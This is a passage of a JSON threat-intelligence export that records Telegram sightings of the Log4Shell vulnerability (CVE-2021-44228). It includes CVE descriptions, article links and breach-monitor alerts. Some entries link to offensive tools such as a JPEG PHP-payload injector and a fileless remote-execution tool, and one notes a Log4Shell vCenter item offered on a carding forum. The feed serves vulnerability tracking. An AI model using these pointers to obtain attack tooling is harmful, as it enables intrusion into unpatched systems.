"2023-12-04T19:02:15.000000Z"}, {"uuid": "56841e2f-86ea-4534-9b30-a58678bd3912", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arpsyndicate/1641", "content": "#ExploitObserverAlert\n\nCVE-2021-44228\n\nDESCRIPTION: Exploit Observer has 1853 entries related to CVE-2021-44228. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-10T14:58:02.000000Z"}, {"uuid": "7cd323e1-cc1c-447b-b120-a04505dedd85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arpsyndicate/867", "content": "#ExploitObserverAlert\n\nCVE-2021-44228\n\nDESCRIPTION: Exploit Observer has 1853 entries related to CVE-2021-44228. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-02T00:47:46.000000Z"}, {"uuid": "8fa8393e-9a20-49da-bc40-e97af8de9895", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arpsyndicate/1569", "content": "#ExploitObserverAlert\n\nCVE-2021-44228\n\nDESCRIPTION: Exploit Observer has 1851 entries related to CVE-2021-44228. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-08T13:41:14.000000Z"}, {"uuid": "e7abb1d3-aef1-4691-abc0-fcc92853bcdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/arpsyndicate/1690", "content": "#ExploitObserverAlert\n\nCVE-2021-44228\n\nDESCRIPTION: Exploit Observer has 1853 entries related to CVE-2021-44228. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-11T02:45:06.000000Z"}, {"uuid": "63dad6c2-ffe4-4436-84f9-ca39c4e9523e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/MARIANA_WEB_OFFICIAL/273", "content": "\u2726 @MARIANA_WEB_OFFICIAL \u2726", "creation_timestamp": "2022-08-14T16:26:33.000000Z"}, {"uuid": "2cec7cd3-98d6-4da5-8633-9a2c2545f0b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberDilara/1414", "content": "#Github #Tools\n\nOpen source data anonymization and synthetic data orchestration for developers. Create high fidelity synthetic data and sync it across your environments.\n\nhttps://github.com/nucleuscloud/neosync\n\nOSINT tool to crawl a site and extract useful recon info\n\nhttps://github.com/chm0dx/creepyCrawler\n\nInjects php payloads into jpeg images\n\nhttps://github.com/dlegs/php-jpeg-injector\n\nFileless atexec, no more need for port 445\n\nhttps://github.com/Ridter/atexec-pro\n\nA experimental cli tool to encrypt &amp; decrypt files/directories.\n\nhttps://github.com/voodooEntity/go-tachicrypt\n\nCheck out LogMePwn! It's a fast, automated toolkit to scan for and fix Log4J RCE CVE-2021-44228 vulnerability\n\nhttps://github.com/0xInfection/LogMePwn\n\n#HackersForum", "creation_timestamp": "2025-01-05T21:45:07.000000Z"}, {"uuid": "9cd8d15b-aa8c-429c-9ab9-5650c8ed835d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/piratesofyemen/363", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2021-44228 \u0641\u064a \u0645\u0643\u062a\u0628\u0629 Apache Log4j\n\nhttps://securelist.ru/cve-2021-44228-vulnerability-in-apache-log4j-library/104144/\n\n#My_pride_is_crazy #The_Yemeni_ghost", "creation_timestamp": "2021-12-19T17:48:04.000000Z"}, {"uuid": "beace4f8-f920-4a33-ac0f-17a56b622c2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44224", "type": "seen", "source": "Telegram/EGF3NmaXYAGdUVCW6ZNHpq65TpVvAZPt5jTlYHUdXoaBYbM", "content": "", "creation_timestamp": "2022-03-04T19:45:45.000000Z"}, {"uuid": "75809cc9-3e34-43b7-a376-382eaa400920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/uKv8shv3okWAklgPj_bfDKQgXuFsx43ivhs8KNTxdUkHotM", "content": "", "creation_timestamp": "2025-05-08T17:00:09.000000Z"}, {"uuid": "f6bba58e-4fd8-40ca-88b6-0576502cc85a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/piratesofyemen1213/200", "content": "\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2021-44228 \u0641\u064a \u0645\u0643\u062a\u0628\u0629 Apache Log4j\n\nhttps://securelist.ru/cve-2021-44228-vulnerability-in-apache-log4j-library/104144/\n\n#My_pride_is_crazy #The_Yemeni_ghost", "creation_timestamp": "2021-12-19T17:48:12.000000Z"}, {"uuid": "17a39e8a-ac17-4261-8642-91c783241296", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/5lwIiVRlGValAb7a3y7unGCeHw0VejzNjVdua0u49Ev9FgE", "content": "", "creation_timestamp": "2025-01-20T16:00:09.000000Z"}, {"uuid": "4646ac34-4d78-4afa-a0fc-bca86c68a7cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/lRpgrhdK150-vU8p_dJwL9pEkDdT3SZwxrAK8WOrSkApMic", "content": "", "creation_timestamp": "2025-05-07T17:00:09.000000Z"}, {"uuid": "f9ef33d5-ae0b-41a0-99ab-0df3794428e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/yKcGWhhQJwisJolliiSQ_Vwze7Rv8usdLxIEJwq6Laah_Gw", "content": "", "creation_timestamp": "2025-02-26T22:00:06.000000Z"}, {"uuid": "e7d019f7-e85c-4152-bea1-6a86689cfd1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/PTHKQ06bP3q6apx3Krv4L2iJCBBovWGsPYlkQuufLnbVvmI", "content": "", "creation_timestamp": "2025-03-04T16:00:08.000000Z"}, {"uuid": "d1580b18-5caa-4cf7-86d1-8a189007c2e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/TB56tBq6u2SsDBUJgyDuxe9IqMKMIrkCMO2Z0US8exM1CXw", "content": "", "creation_timestamp": "2025-03-11T04:00:07.000000Z"}, {"uuid": "967c4244-1602-49ab-ac97-c8a8773cbed3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/Lk08SRcMS-SPvUQrC5iLhxWRy_IgExecorO8K45SNl9E-QE", "content": "", "creation_timestamp": "2025-02-17T16:00:07.000000Z"}, {"uuid": "409c180c-4997-480b-bcbd-92625d2c225f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/YXXAYpim7CTBciEsZ274r31Y5zZFEUA-ADCgFk7JYE3PFkE", "content": "", "creation_timestamp": "2025-03-12T10:00:05.000000Z"}, {"uuid": "965bee18-1155-48aa-903c-1af620e0dca8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/BABATATASASA/6621", "content": "CVE - CVE-2021-44228\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228", "creation_timestamp": "2024-02-15T17:24:31.000000Z"}, {"uuid": "4ca20dff-c6ab-4dc6-8343-b7db7667b941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/KOAYmSgON7S0mbyC67tYMirxRLWLoNf_WFYRGpDeFb0Q", "content": "", "creation_timestamp": "2021-12-11T18:44:46.000000Z"}, {"uuid": "bbdaf625-26e6-4da6-84ec-6f19be99ab1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/breachdetector/621025", "content": "{\n  \"Source\": \"https://legitcarders.ws/\",\n  \"Content\": \"Log4Shell VMware vCenter Server (CVE-2021-44228)\", \n  \"author\": \" (Premiums)\",\n  \"Detection Date\": \"09 Oct 2024\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2024-10-09T07:23:38.000000Z"}, {"uuid": "0d02e557-53d4-4aec-b5a6-37e23504dcd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/dilagrafie/4065", "content": "#Github #Tools\n\nOpen source data anonymization and synthetic data orchestration for developers. Create high fidelity synthetic data and sync it across your environments.\n\nhttps://github.com/nucleuscloud/neosync\n\nOSINT tool to crawl a site and extract useful recon info\n\nhttps://github.com/chm0dx/creepyCrawler\n\nInjects php payloads into jpeg images\n\nhttps://github.com/dlegs/php-jpeg-injector\n\nFileless atexec, no more need for port 445\n\nhttps://github.com/Ridter/atexec-pro\n\nA experimental cli tool to encrypt &amp; decrypt files/directories.\n\nhttps://github.com/voodooEntity/go-tachicrypt\n\nCheck out LogMePwn! It's a fast, automated toolkit to scan for and fix Log4J RCE CVE-2021-44228 vulnerability\n\nhttps://github.com/0xInfection/LogMePwn\n\n#HackersForum", "creation_timestamp": "2025-01-05T14:25:28.000000Z"}, {"uuid": "0ebb4b58-0a84-4216-bdf9-ae8ad6882b55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/BlackHut_Egy/1055", "content": "Log4Shell / CVE-2021-44228 / CVSS 10\n\nA new highly critical RCE vulnerability in the Java-based Log4J logging library affects a large number of applications and services on the Internet.\n\nDetails \u2014 https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html\n\n#vulnerability", "creation_timestamp": "2021-12-11T05:29:19.000000Z"}, {"uuid": "4da5e078-385e-4f70-b1da-728a48af5df4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/qnumTWDr1axN-FIML1QVV8Iv3S976pWmiWcai19I7PtXXA", "content": "", "creation_timestamp": "2021-12-11T15:34:59.000000Z"}, {"uuid": "9c43265d-5863-4ce9-9471-7abe495e992d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/breachdetector/19820", "content": "\u26a0 Detectada filtraci\u00f3n \u26a0\n{\n  \"site\": \"bhf.io\",\n  \"Threat Actor\": \"Asketset\",\n  \"Content\": \"\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-44228 \u0432 Log4Shell .\u201d,\n  \"Detection Date\": \"16 Dec 2021 05:47\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 Data Leak monitoring system\ud83d\udd39", "creation_timestamp": "2021-12-16T05:57:47.000000Z"}, {"uuid": "fc1050e4-995c-422d-92dd-f4db96848f2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/kdtE-35uHZKBXjtEN5Rb2Jc4aHT_ye_2U7aMFnyXlNQ2TDw", "content": "", "creation_timestamp": "2024-05-07T19:28:48.000000Z"}, {"uuid": "3c5b925b-66ce-4e2d-9e26-9505c37fdc22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/proxy_bar/1190", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T06:36:16.000000Z"}, {"uuid": "724fb7fd-3c21-4889-b452-c6d4b35b42b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/trJr40edTUYHbFqgY59qFg6euW65-gZX7Ic1n3l7RxDCzMY", "content": "", "creation_timestamp": "2023-12-11T20:21:29.000000Z"}, {"uuid": "dac26709-6c24-4eae-b52e-4d3f8d0fd382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/h_r9ff1WrhgJY9rNGr42oYTVyGs7DrKJYfuGaAPSOe65wFA", "content": "", "creation_timestamp": "2022-10-03T04:58:08.000000Z"}, {"uuid": "939f2cf8-770d-4803-ada0-2327de18196e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/m6K7aMIh1MKo2rgiyReP1ZxVGfqgDGOBDlx764FvV80dtpo", "content": "", "creation_timestamp": "2022-09-26T15:39:04.000000Z"}, {"uuid": "9b81d600-3a6e-4dd2-ba6d-1e96ea761fe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "Telegram/4QiYGrKzt79zSBR-hvdRLiepAQyubhrHHnLyUJqNMS3VGZ8", "content": "", "creation_timestamp": "2024-04-16T12:23:49.000000Z"}, {"uuid": "ff8f3b40-be15-4480-b503-9fb9c95bf389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "Telegram/8yasABRsBeQ7_fA7ekcVN5-Bf6YalSSK4RwFtvSF2nNKkrM", "content": "", "creation_timestamp": "2022-12-06T17:10:12.000000Z"}, {"uuid": "e0020a45-6b2e-4590-89e1-c26d4d002ed0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GrayHatsHack/7827", "content": "#Github #Tools\n\nOpen source data anonymization and synthetic data orchestration for developers. Create high fidelity synthetic data and sync it across your environments.\n\nhttps://github.com/nucleuscloud/neosync\n\nOSINT tool to crawl a site and extract useful recon info\n\nhttps://github.com/chm0dx/creepyCrawler\n\nInjects php payloads into jpeg images\n\nhttps://github.com/dlegs/php-jpeg-injector\n\nFileless atexec, no more need for port 445\n\nhttps://github.com/Ridter/atexec-pro\n\nA experimental cli tool to encrypt &amp; decrypt files/directories.\n\nhttps://github.com/voodooEntity/go-tachicrypt\n\nCheck out LogMePwn! It's a fast, automated toolkit to scan for and fix Log4J RCE CVE-2021-44228 vulnerability\n\nhttps://github.com/0xInfection/LogMePwn\n\n#HackersForum", "creation_timestamp": "2025-01-05T21:46:05.000000Z"}, {"uuid": "f71cea84-e7bd-4dcb-8548-3d960674ddc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/clonru/107329", "content": "\u0422\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j\n\n Log4jshell CVE-2021-44228 \u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 JNDI \u0432 Apache Log4j2 2.0-beta9 (\u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 2.14.1) \u0432 \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c LDAP \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043a\u0443\u0434\u0430 \u0443\u0433\u043e\u0434\u043d\u043e. \u0425\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u043c\u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0438\u043b\u0438 \u0438\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 LDAP. CVE-2021-45046 \u0411\u044b\u043b\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 CVE-2021-44228 \u0432 Apache Log4j 2.15.0 \u0431\u044b\u043b\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u043f\u0440\u0438 \u0432\u044b\u0431\u043e\u0440\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043d\u0435 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u0415\u0441\u043b\u0438 \u043f\u0440\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0436\u043e\u043d\u0433\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043d\u044b\u043c \u043f\u043e\u0438\u0441\u043a\u043e\u043c (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00ab$${ctx:LoginID}\u00bb), \u0445\u0430\u043a\u0435\u0440\u044b, \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0445\u043e\u0434\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Thread Context Map (MDC), \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 JNDI Lookup. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0442\u0435\u0447\u043a\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0434\u0430\u0451\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b... \n\n http://forumpolitika.org/component/k2/item/87406 \n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: @gubernatorskay \u0438 @progekt_kz", "creation_timestamp": "2023-08-11T02:04:26.000000Z"}, {"uuid": "a79e3bd6-a81f-4057-8783-e04624f144fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/hack_less/325", "content": "\ud83d\udc7e\u041f\u0435\u043d\u0442\u0435\u0441\u0442 Apache log4j\n\n\u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache log4j. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-44228 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u043e, \u043e\u0431 \u044d\u0442\u043e\u043c \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u0441\u0430\u043c\u044b\u0439 \u0432\u044b\u0441\u043e\u043a\u0438\u0439 \u0440\u0435\u0439\u0442\u0438\u043d\u0433 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS \u2014 10 \u0431\u0430\u043b\u043b\u043e\u0432.\n\n\u2796 https://telegra.ph/Testirovanie-na-proniknovenie-s-pomoshchyu-uyazvimosti-v-biblioteke-Apache-log4j-05-24\n\n#less | \ud83d\udc80 \u042d\u0442\u0438\u0447\u043d\u044b\u0439 \u0445\u0430\u043a\u0435\u0440", "creation_timestamp": "2023-01-01T04:58:50.000000Z"}, {"uuid": "aeaa605b-be53-49bd-bf6f-c5229044e4a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/tmsilent/1055", "content": "CVE-2021-44228 (Remote code execution)\n\nApache Log4j2 versi 2.0-beta7 hingga 2.17.0 (tidak termasuk rilis perbaikan keamanan 2.3.2 dan 2.12.4) rentan terhadap serangan eksekusi kode jarak jauh (RCE) di mana penyerang dengan izin untuk memodifikasi file konfigurasi logging dapat membuat konfigurasi berbahaya menggunakan JDBC Appender dengan sumber data yang mereferensikan URI JNDI yang dapat mengeksekusi kode jarak jauh. Masalah ini diperbaiki dengan membatasi nama sumber data JNDI ke protokol java di Log4j2 versi 2.17.1, 2.12.4, dan 2.3.2.\n\nhttps://youtu.be/060VHbjbmjM", "creation_timestamp": "2021-12-30T07:58:58.000000Z"}, {"uuid": "b52baf56-2f10-4874-a6a3-a432690013bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/hacker_trick/555", "content": "\u062b\u063a\u0631\u0629 Log4Shell \n\u0627\u0644\u0623\u0633\u0628\u0648\u0639 \u0627\u0644\u0645\u0627\u0636\u064a \u062a\u0645 \u0637\u0631\u062d\u00a0\u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 